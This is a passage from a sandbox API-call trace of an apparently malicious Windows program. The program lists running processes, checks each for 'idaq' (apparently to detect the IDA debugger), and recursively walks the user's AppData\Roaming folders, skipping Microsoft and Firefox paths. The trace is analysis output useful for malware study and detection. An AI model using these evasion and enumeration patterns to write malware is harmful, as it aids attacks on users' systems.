dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0083.097] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="idaq") returned 0x0 [0083.097] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0083.097] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="idaq") returned 0x0 [0083.097] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0083.098] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="idaq") returned 0x0 [0083.098] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0083.098] StrStrIW (lpFirst="medicaid.exe", lpSrch="idaq") returned 0x0 [0083.098] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0083.098] StrStrIW (lpFirst="gateway.exe", lpSrch="idaq") returned 0x0 [0083.099] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0083.099] StrStrIW (lpFirst="laden.exe", lpSrch="idaq") returned 0x0 [0083.099] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0083.099] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="idaq") returned 0x0 [0083.099] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0083.100] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="idaq") returned 0x0 [0083.100] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0083.100] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="idaq") returned 0x0 [0083.100] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0083.100] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="idaq") returned 0x0 [0083.100] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0083.101] StrStrIW (lpFirst="saturday.exe", lpSrch="idaq") returned 0x0 [0083.101] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0083.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.104] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.116] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.128] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.138] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.140] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.151] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0083.152] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe") returned 0 [0083.153] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="microsoft") returned 0x0 [0083.153] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", lpSrch="firefox") returned 0x0 [0083.153] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*" [0083.153] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 0x586b20 [0083.154] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.154] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.154] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Acrobat" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat" [0083.154] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat") returned 0 [0083.154] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="microsoft") returned 0x0 [0083.154] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", lpSrch="firefox") returned 0x0 [0083.154] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0083.154] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.154] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.154] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.154] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat", pszFile="10.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0" [0083.154] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0") returned 0 [0083.156] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="microsoft") returned 0x0 [0083.156] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", lpSrch="firefox") returned 0x0 [0083.156] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0083.156] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586ba0 [0083.156] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.156] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.156] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Collab" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab" [0083.156] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab") returned 1 [0083.156] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="microsoft") returned 0x0 [0083.157] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", lpSrch="firefox") returned 0x0 [0083.157] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0083.157] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586be0 [0083.157] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.157] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.157] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.157] Sleep (dwMilliseconds=0x0) [0083.160] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.160] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Forms" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms" [0083.160] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms") returned 1 [0083.162] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="microsoft") returned 0x0 [0083.162] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", lpSrch="firefox") returned 0x0 [0083.162] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*" [0083.162] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Forms\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586be0 [0083.163] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.163] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.163] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.163] Sleep (dwMilliseconds=0x0) [0083.163] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.163] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="JavaScripts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts" [0083.163] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts") returned 0 [0083.163] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="microsoft") returned 0x0 [0083.163] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", lpSrch="firefox") returned 0x0 [0083.164] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*" [0083.164] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586be0 [0083.164] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.164] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.164] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.164] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.164] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.164] Sleep (dwMilliseconds=0x0) [0083.164] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.164] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0", pszFile="Security" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security" [0083.164] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 0 [0083.164] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="microsoft") returned 0x0 [0083.164] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", lpSrch="firefox") returned 0x0 [0083.164] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*" [0083.164] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0x586be0 [0083.165] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 1 [0083.165] PathCombineW (in: pszDest=0x18d0b8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache" [0083.165] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 0 [0083.165] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="microsoft") returned 0x0 [0083.165] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", lpSrch="firefox") returned 0x0 [0083.165] PathCombineW (in: pszDest=0x18cc40, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*" [0083.165] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0x586c20 [0083.165] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 1 [0083.165] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18ce48 | out: lpFindFileData=0x18ce48) returned 0 [0083.165] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.165] Sleep (dwMilliseconds=0x0) [0083.165] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d2c0 | out: lpFindFileData=0x18d2c0) returned 0 [0083.165] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.165] Sleep (dwMilliseconds=0x0) [0083.165] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.165] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.165] Sleep (dwMilliseconds=0x0) [0083.165] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.165] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.165] Sleep (dwMilliseconds=0x0) [0083.165] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.165] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player" [0083.165] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player") returned 0 [0083.166] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="microsoft") returned 0x0 [0083.166] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", lpSrch="firefox") returned 0x0 [0083.166] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0083.166] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.166] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.166] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.166] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0083.166] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned 1 [0083.166] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="microsoft") returned 0x0 [0083.166] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", lpSrch="firefox") returned 0x0 [0083.167] PathCombineW (in: pszDest=0x18d530, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0083.167] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0x586ba0 [0083.167] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 1 [0083.167] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d738 | out: lpFindFileData=0x18d738) returned 0 [0083.167] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.167] Sleep (dwMilliseconds=0x0) [0083.167] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.167] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.167] Sleep (dwMilliseconds=0x0) [0083.167] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.167] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights" [0083.167] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights") returned 1 [0083.167] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="microsoft") returned 0x0 [0083.167] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", lpSrch="firefox") returned 0x0 [0083.167] PathCombineW (in: pszDest=0x18d9a8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*" [0083.167] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0x586b60 [0083.167] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 1 [0083.167] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dbb0 | out: lpFindFileData=0x18dbb0) returned 0 [0083.167] FindClose (in: hFindFile=0x586b60 | out: hFindFile=0x586b60) returned 1 [0083.167] Sleep (dwMilliseconds=0x0) [0083.167] FindNextFileW (in: hFindFile=0x586b20, lpFindFileData=0x18e028 | out: lpFindFileData=0x18e028) returned 1 [0083.167] PathCombineW (in: pszDest=0x18de20, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics" [0083.167] PathIsDirectoryEmptyW (pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics") returned 0 [0083.168] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="microsoft") returned 0x0 [0083.168] StrStrIW (lpFirst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Adobe\\Linguistics", lpSrch="firefox") returned 0x0 [0083.168] PathCombineW (in: pszDest=0x18d9a8, 